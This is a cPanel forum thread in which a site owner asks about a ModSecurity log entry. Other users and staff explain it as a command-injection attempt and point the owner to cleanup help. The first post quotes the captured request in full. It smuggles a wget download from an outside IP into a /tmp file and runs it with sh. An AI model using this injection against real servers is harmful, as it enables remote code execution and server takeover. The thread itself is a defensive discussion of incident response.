Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Entry in Mod Security Log question

Discussion in 'Security' started by webstuff, Jun 25, 2018.

Tags:
  1. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    56
    We recently found some scripts that look pretty nasty.. Any body have any idea what this person was trying to do?

    GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

    thanks
     
  2. sktest123

    sktest123 Well-Known Member

    Joined:
    Jan 31, 2017
    Messages:
    99
    Likes Received:
    5
    Trophy Points:
    8
    Location:
    kochin
    cPanel Access Level:
    Root Administrator
    sort of command injection, via php cgi query string , seems trying to download remote shell script to tmp and execute it.
     
  3. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,870
    Likes Received:
    1,811
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    The previous post includes an accurate description of what it looks attack was attempting to do. Let us know if you have additional questions.

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    56
    There was a security issue with a php file and tmp files were being deleted..

    I'm not sure if this helps any..

    Uptime: 123 seconds
    Executable:
    /usr/bin/php
    Command Line (often faked in exploits):
    /usr/bin/php
    Network connections by the process (if any):
    tcp: 127.0.0.1:33596 -> 127.0.0.1:3306
    tcp: 127.0.0.1:33598 -> 127.0.0.1:3306
    Files open by the process (if any):

    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error_log
    /tmp/.ZendSem.gYLBCK (deleted)
    /tmp/ZCUDi4colR (deleted)


    I have more of the log too. Any other ideas or suggestions on where to look ? I see they are trying to connect... They tried to connect 30 times today too.
     
  5. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,870
    Likes Received:
    1,811
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists?

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    56

    Yes I did remove the php hole or at least I believe I did. So far I haven't seen any funky stuff but I have seen this. The only other question I have with this is.. Do you think there is any chance they could have gotten my mysql database login? In other words. When you see this sort of log I assume you wouldn't need the mysql password username correct? Or is there a possibilty. Also I can provide whatever else if you would like too. I do have some of the orgrinal files for some items. (The entire website was a complete mess. I had contacted my hosting provider talked to the security team and they kept telling me I had nothing to worry about but I just didn't buy that so this is sort of a learning experience for me too. After I started removing the stuff I stopped getting high server alerts other alerts etc..) But I do see connections like that in my mod security. Just want to be 110% sure I am not missing anything. Also I did happen to find some advance malware link I believe to where it installs a virus in the firm I believe. And if I understand everything correctly its one of those where if you wipe the drive complete format it still stays on the system. Plus there were open folders public keys etc.. I do not believe anything got changed but then again from my newbie side of details I always could be missing something. There is other stuff that isn't going on which gives me the reason to believe I got it too. I will gladly pm any details too.

    Thank you again so much for the help.

    Thank you again.
     
  7. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,870
    Likes Received:
    1,811
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello @webstuff,

    It's difficult to know for sure the extent at which the attacker was able to gain access to your website's files and passwords (assuming they were stored in a PHP configuration file). For additional investigation, it's generally a good idea to consult with a qualified system administrator. We provide a list of companies offering system administration services at:

    System Administration Services | cPanel Forums

    Additionally, we provide some more information about our Technical Support Department's ability to troubleshoot issues stemming from a hacked server at:

    Why can't I clean a hacked machine - cPanel Knowledge Base - cPanel Documentation

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    56
    Yes I removed the files. In mod security its showing they where trying to connect to 127.0.0.1 Can anyone point me in the right direction on this? Its showing blocked each time.. Or any thoughts at all?
     
  9. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    56
    ok just saw that I looked into that. haha actually some top people were hired and they said they saw nothing and it was nothing to worry about. They though it was email or some other files which clearly wasn't correct. I am glad I kept investigating. I will keep you posted.
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice